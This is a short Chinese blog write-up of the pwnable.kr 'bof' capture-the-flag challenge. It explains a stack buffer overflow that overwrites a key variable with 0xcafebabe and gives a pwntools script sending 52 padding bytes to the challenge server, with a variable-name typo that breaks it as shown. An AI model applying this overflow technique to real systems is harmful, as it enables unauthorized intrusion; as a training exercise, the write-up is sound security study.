18.9.17 pwnable.kr----bof - 5 pt

xiaoyuyulala

于 2018-09-17 19:42:49 发布

阅读量201

点赞数

CC 4.0 BY-SA版权

分类专栏： PWN_WP 文章标签： pwnable.kr bof

本文链接：https://blog.youkuaiyun.com/qq_42192672/article/details/82747802

PWN_WP 专栏收录该内容

23 篇文章

订阅专栏

本文介绍了一种通过缓冲区溢出实现攻击的方法。利用直接调整ebp寄存器，修改返回地址，覆盖特定内存地址来注入自定义值0xcafebabe。通过Python的pwntools库构造恶意payload并发送至目标服务，最终成功触发漏洞。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

直接调整ebp，修改renturnaddress，覆盖到key的地址后赋值0xcafebabe就可以了

ebp地址偏移量可一直接在IDA里面看见哟

上脚本

#coding=utf-8
from pwn import *
conn=remote("pwnable.kr",9000)
payload='a'*52+p32(0xcafebabe)
conn.recvuntil('overflow me : ')
conn.sendline(paylaod)
conn.interactive()

#daddy, I just pwned a buFFer :)